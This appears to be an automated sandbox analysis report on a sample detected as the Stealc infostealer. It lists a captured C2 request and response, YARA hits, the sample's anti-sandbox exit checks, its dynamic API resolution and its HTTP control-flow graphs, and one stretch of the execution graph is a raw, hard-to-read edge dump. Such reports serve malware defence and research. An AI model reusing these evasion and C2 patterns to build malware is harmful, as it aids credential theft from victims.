Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="hwid"69523E94770B612331747------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build"tale------CBAKEBGIIDAFIDHIIECF--

Oct 29, 2024 14:11:19.442651987 CET | 210 | IN
HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 13:11:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                                      Target ID:0
                                      Start time:09:11:13
                                      Start date:29/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x4e0000
                                      File size:2'113'024 bytes
                                      MD5 hash:AB7D9340BEE9CB1F62845FCAEA9476CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:3.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:2.9%
                                        Total number of Nodes:1327
                                        Total number of Limit Nodes:24
Execution graph

The interactive graph was extracted as a flat token stream (node id, function address, API labels, edges written as id->id). The node ids are dropped here; the call chains are summarised by function address with the API calls the graph attributes to each.

Entry and import resolution
  4f6c90 -> 4e22a0: 43 consecutive nodes call 4e4610 (RtlAllocateHeap, VirtualProtect), stepping through 4e22b4 .. 4e26ce
  4f9bb0: 4f9aa0 (GetPEB), 4f9bdc (21 API calls), then LoadLibraryA x5 at 4f9de3 and GetProcAddress at 4f9e44, 4f9e66, 4f9e9f, 4f9ec1, 4f9ee2
  4f6ca0: 4faa50 (lstrcpy) -> 4e11d0

Environment checks; every failing branch ends in ExitProcess
  4e11d0: ExitProcess at 4e120f, else 4e1160 GetSystemInfo -> ExitProcess at 4e117c, else 4e1110 GetCurrentProcess, VirtualAllocExNuma -> ExitProcess at 4e1141, else 4e10a0 VirtualAlloc (VirtualFree at 4e10e2)
  4e1220: 4f8b40 GlobalMemoryStatusEx -> 4e1249 (__aulldiv) -> ExitProcess at 4e1292, else 4f6a10 GetUserDefaultLangID -> 4f6a32 with five ExitProcess exits (4f6a43, 4f6a4d, 4f6a57, 4f6a61, 4f6a6b), else 4f6a73
  4e1190: 4f7a70 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) and 4f79e0 (GetProcessHeap, RtlAllocateHeap, GetUserNameA) -> ExitProcess at 4e11c4, else 4f6cd0 -> 4f7a70 again -> 4f6ce3
  4f6d04 .. 4f6d20: four calls to 4facc0 (4faa20, lstrlen, lstrcpy, lstrcat, 4faab0), then 4fabb0 (lstrcpy)
  4f6d29 loop: 4f6d62 OpenEventA -> 4f6d81 CreateEventA and fall through, or 4f6d95 CloseHandle, Sleep and retry
  4f6bc0: GetSystemTime -> 4f6ac0 (string assembly: 4faa50, 4facc0 x6, 4fabb0 x6, 4faab0) -> 4f6c38 sscanf -> 4fab10 -> 4f6c4a SystemTimeToFileTime x2 -> ExitProcess at 4f6c78, else 4f5d60

Main routine 4f5d60
  string assembly via 4faa50, 4fab30 (lstrlen, lstrcpy) and 4f6680 (4fabb0 x4), then 4e26f0: 316 consecutive nodes call 4e4610 (RtlAllocateHeap, VirtualProtect), stepping through 4e2704 .. 4e45f9
  4f9f20: 4f9f30 (43 API calls), 4fa346 (8), 4fa463 (8), 4fa5b5 (6), 4fa654 (9), 4fa832 (10), with GetProcAddress runs at 4fa3dc, 4fa52f, 4fa738, 4fa7bb, 4fa7f5, 4fa92b, 4fa996, 4fa9b7
  4e1590 -> 4e16b0 -> 4faab0 (lstrcpy) x4 -> 4f5760: 4fab30 x3, 4faa50 x4, then a comparison loop (StrCmpCA at 4f5893, 4f58f0, 4f59da, 4f5aa6, 4f5b8f, 4f5c5b; Sleep at 4f5c66) calling 4f5510 (25 API calls), 4f5440 (20 API calls), 4e16b0 and the lstrcpy/lstrlen helpers
  4f5f13 .. 4f5fee: 4f6680, 4faab0, 4facc0 and 4fabb0 x3, 4faa50
  4f7690: GetWindowsDirectoryA, GetVolumeInformationA (4f76e3), GetProcessHeap, RtlAllocateHeap (4f778c), wsprintfA (4f77b8), 4faa50
  4e48d0: 4faab0, 4e4800, 4faa50 x5, InternetOpenA, StrCmpCA (4e495b); on success 4f8cf0, string assembly through 4fac30/4facc0/4fabb0, InternetConnectA (4e4af3), HttpOpenRequestA (4e4b23), further string assembly, lstrlen (4e4e37, 4e4e53), 4fade0, HttpSendRequestA (4e4e63), an InternetReadFile loop (4e4e82 / 4e4eae with 4facc0, 4fabb0), InternetCloseHandle (4e4eb7, 4e4f0e, 4e4f1b); the response goes to 4ea210 CryptStringToBinaryA, then 4fab30, 4facc0, 4fabb0, 4faab0 (ctype at 4e4f77)
  4f19f0: 4fade0, StrCmpCA (4f1a14) -> ExitProcess at 4f1a1f, else 4f1a27
  Per-module routines, each entered through 4faa50 / 4e1590 (lstrcpy) and in most cases 4e59b0 (34 API calls, ctype): 4f1280 (lstrlen, lstrcpy), 4f0fc0 (StrCmpCA x3, lstrlen, lstrcpy), 4f1170 (StrCmpCA, lstrlen, lstrcpy), 4f1c60 (115 API calls), 4e5000 (7), 4f08a0 (287), 4f13c0 (StrCmpCA, lstrlen, lstrcpy), 4e1ec0 (59); branching at 4f6240 into 4f1520 (19, ctype), 4f4010 (67), 4f37b0 (31), 4f4300 (57, 2 library calls), 4f5350 (46), 4f49d0 (88, ctype), 4f4e00 (61, ctype), 4f4fc0 (65), 4f5190 (63, ctype), 4e7770 (109, ctype), 4f52a0 (61, ctype), 4f91a0 (46, ctype), then on the 4f6470 path 4f1520 and 4f4010 again, 4f37b0 again, and 4f68d0 (9, ctype)
  4f6588 -> 4f6db6: CloseHandle, ExitProcess
37392->37397 37394 4f1c12 37394->36313 37395 4f1acf StrCmpCA 37395->37397 37396 4f1aad StrCmpCA 37396->37397 37397->37394 37397->37395 37397->37396 37398 4f1b63 StrCmpCA 37397->37398 37399 4f1b82 StrCmpCA 37397->37399 37400 4f1b41 StrCmpCA 37397->37400 37401 4f1ba1 StrCmpCA 37397->37401 37402 4f1bc0 StrCmpCA 37397->37402 37403 4f1b1f StrCmpCA 37397->37403 37404 4f1afd StrCmpCA 37397->37404 37405 4fab30 lstrlen lstrcpy 37397->37405 37398->37397 37399->37397 37400->37397 37401->37397 37402->37397 37403->37397 37404->37397 37405->37397 37406->36319 37407->36321 37408->36327 37409->36329 37410->36335 37411->36337 37412->36341 37413->36345 37414->36349 37415->36355 37416->36357 37417->36361 37418->36374 37419->36379 37420->36378 37421->36375 37422->36378 37423->36390 37424->36416 37425->36395 37426->36403 37427->36392 37428->36393 37429->36396 37430->36405 37431->36407 37432->36432 37433->36436 37434->36435 37435->36431 37436->36435 37437->36445 37440 4faab0 lstrcpy 37439->37440 37441 4e16c3 37440->37441 37442 4faab0 lstrcpy 37441->37442 37443 4e16d5 37442->37443 37444 4faab0 lstrcpy 37443->37444 37445 4e16e7 37444->37445 37446 4faab0 lstrcpy 37445->37446 37447 4e15a3 37446->37447 37447->37172 37449 4e4816 37448->37449 37450 4e4888 lstrlen 37449->37450 37474 4fade0 37450->37474 37452 4e4898 InternetCrackUrlA 37453 4e48b7 37452->37453 37453->37249 37455 4faa50 lstrcpy 37454->37455 37456 4f8d04 37455->37456 37457 4faa50 lstrcpy 37456->37457 37458 4f8d12 GetSystemTime 37457->37458 37459 4f8d29 37458->37459 37460 4faab0 lstrcpy 37459->37460 37461 4f8d8c 37460->37461 37461->37264 37463 4fac41 37462->37463 37464 4fac98 37463->37464 37466 4fac78 lstrcpy lstrcat 37463->37466 37465 4faab0 lstrcpy 37464->37465 37467 4faca4 37465->37467 37466->37464 37467->37267 37468->37382 37470 4e4f3e 37469->37470 37471 4ea249 LocalAlloc 37469->37471 37470->37270 37470->37272 37471->37470 37472 4ea264 CryptStringToBinaryA 37471->37472 37472->37470 37473 4ea289 LocalFree 37472->37473 
37473->37470 37474->37452 37475->37392

                                        Control-flow Graph

                                        control_flow_graph 660 4f9bb0-4f9bc4 call 4f9aa0 663 4f9bca-4f9dde call 4f9ad0 GetProcAddress * 21 660->663 664 4f9de3-4f9e42 LoadLibraryA * 5 660->664 663->664 666 4f9e5d-4f9e64 664->666 667 4f9e44-4f9e58 GetProcAddress 664->667 669 4f9e96-4f9e9d 666->669 670 4f9e66-4f9e91 GetProcAddress * 2 666->670 667->666 671 4f9e9f-4f9eb3 GetProcAddress 669->671 672 4f9eb8-4f9ebf 669->672 670->669 671->672 673 4f9ed9-4f9ee0 672->673 674 4f9ec1-4f9ed4 GetProcAddress 672->674 675 4f9ee2-4f9f0c GetProcAddress * 2 673->675 676 4f9f11-4f9f12 673->676 674->673 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,01452440), ref: 004F9BF1
                                        • GetProcAddress.KERNEL32(74DD0000,014521D0), ref: 004F9C0A
                                        • GetProcAddress.KERNEL32(74DD0000,01452218), ref: 004F9C22
                                        • GetProcAddress.KERNEL32(74DD0000,014521A0), ref: 004F9C3A
                                        • GetProcAddress.KERNEL32(74DD0000,014522C0), ref: 004F9C53
                                        • GetProcAddress.KERNEL32(74DD0000,014590A0), ref: 004F9C6B
                                        • GetProcAddress.KERNEL32(74DD0000,014456F0), ref: 004F9C83
                                        • GetProcAddress.KERNEL32(74DD0000,01445630), ref: 004F9C9C
                                        • GetProcAddress.KERNEL32(74DD0000,014521B8), ref: 004F9CB4
                                        • GetProcAddress.KERNEL32(74DD0000,014522F0), ref: 004F9CCC
                                        • GetProcAddress.KERNEL32(74DD0000,014521E8), ref: 004F9CE5
                                        • GetProcAddress.KERNEL32(74DD0000,01452230), ref: 004F9CFD
                                        • GetProcAddress.KERNEL32(74DD0000,01445850), ref: 004F9D15
                                        • GetProcAddress.KERNEL32(74DD0000,014522A8), ref: 004F9D2E
                                        • GetProcAddress.KERNEL32(74DD0000,01452200), ref: 004F9D46
                                        • GetProcAddress.KERNEL32(74DD0000,014458F0), ref: 004F9D5E
                                        • GetProcAddress.KERNEL32(74DD0000,01452248), ref: 004F9D77
                                        • GetProcAddress.KERNEL32(74DD0000,014522D8), ref: 004F9D8F
                                        • GetProcAddress.KERNEL32(74DD0000,01445830), ref: 004F9DA7
                                        • GetProcAddress.KERNEL32(74DD0000,01452260), ref: 004F9DC0
                                        • GetProcAddress.KERNEL32(74DD0000,01445690), ref: 004F9DD8
                                        • LoadLibraryA.KERNEL32(01452500,?,004F6CA0), ref: 004F9DEA
                                        • LoadLibraryA.KERNEL32(01452518,?,004F6CA0), ref: 004F9DFB
                                        • LoadLibraryA.KERNEL32(01452530,?,004F6CA0), ref: 004F9E0D
                                        • LoadLibraryA.KERNEL32(014524B8,?,004F6CA0), ref: 004F9E1F
                                        • LoadLibraryA.KERNEL32(014524A0,?,004F6CA0), ref: 004F9E30
                                        • GetProcAddress.KERNEL32(75A70000,01452470), ref: 004F9E52
                                        • GetProcAddress.KERNEL32(75290000,01452488), ref: 004F9E73
                                        • GetProcAddress.KERNEL32(75290000,014524D0), ref: 004F9E8B
                                        • GetProcAddress.KERNEL32(75BD0000,014524E8), ref: 004F9EAD
                                        • GetProcAddress.KERNEL32(75450000,01445870), ref: 004F9ECE
                                        • GetProcAddress.KERNEL32(76E90000,01459170), ref: 004F9EEF
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004F9F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 004F9EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: d0a4ac2b3194919e5bfe0958740c2b3f095d750cd2de5230f722fc3551bcc40b
                                        • Instruction ID: c6cd9263c3952deab64ae179b76d7e6887fe73502850d998418ca7945af06198
                                        • Opcode Fuzzy Hash: d0a4ac2b3194919e5bfe0958740c2b3f095d750cd2de5230f722fc3551bcc40b
                                        • Instruction Fuzzy Hash: BDA1DDB55182089FC748DF69EC88FA67BB9B7CD601710C71AF609972B4D63C9940CB68

                                        Control-flow Graph

                                        control_flow_graph 764 4e4610-4e46e5 RtlAllocateHeap 781 4e46f0-4e46f6 764->781 782 4e479f-4e47f9 VirtualProtect 781->782 783 4e46fc-4e479a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E465E
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004E47EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46BD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 758a87d3a8deec1eb3771107cde191b00d31a2d6ba22b5b00a48466c8b445f1b
                                        • Instruction ID: f7ecbb52caa9954a48652a12909caf49b61ee6c9a76449744ca155fd91add639
                                        • Opcode Fuzzy Hash: 758a87d3a8deec1eb3771107cde191b00d31a2d6ba22b5b00a48466c8b445f1b
                                        • Instruction Fuzzy Hash: E44103607D26046BE636BBA6894EFDF7B76FFC2790F405840A9A0522C2DBF45500DB27

                                        Control-flow Graph

                                        control_flow_graph 1033 4e62d0-4e635b call 4faab0 call 4e4800 call 4faa50 InternetOpenA StrCmpCA 1040 4e635d 1033->1040 1041 4e6364-4e6368 1033->1041 1040->1041 1042 4e636e-4e6392 InternetConnectA 1041->1042 1043 4e6559-4e6575 call 4faab0 call 4fab10 * 2 1041->1043 1044 4e654f-4e6553 InternetCloseHandle 1042->1044 1045 4e6398-4e639c 1042->1045 1061 4e6578-4e657d 1043->1061 1044->1043 1047 4e639e-4e63a8 1045->1047 1048 4e63aa 1045->1048 1050 4e63b4-4e63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 4e63e8-4e63ec 1050->1052 1053 4e6545-4e6549 InternetCloseHandle 1050->1053 1055 4e63ee-4e640f InternetSetOptionA 1052->1055 1056 4e6415-4e6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 4e647c-4e649b call 4f8ad0 1056->1058 1059 4e6457-4e6477 call 4faa50 call 4fab10 * 2 1056->1059 1066 4e649d-4e64a4 1058->1066 1067 4e6519-4e6539 call 4faa50 call 4fab10 * 2 1058->1067 1059->1061 1070 4e64a6-4e64d0 InternetReadFile 1066->1070 1071 4e6517-4e653f InternetCloseHandle 1066->1071 1067->1061 1074 4e64db 1070->1074 1075 4e64d2-4e64d9 1070->1075 1071->1053 1074->1071 1075->1074 1079 4e64dd-4e6515 call 4facc0 call 4fabb0 call 4fab10 1075->1079 1079->1070
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • InternetOpenA.WININET(00500DFF,00000001,00000000,00000000,00000000), ref: 004E6331
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E6385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E63D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004E640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E6421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004E644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004E64BD
                                        • InternetCloseHandle.WININET(00000000), ref: 004E653F
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6549
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
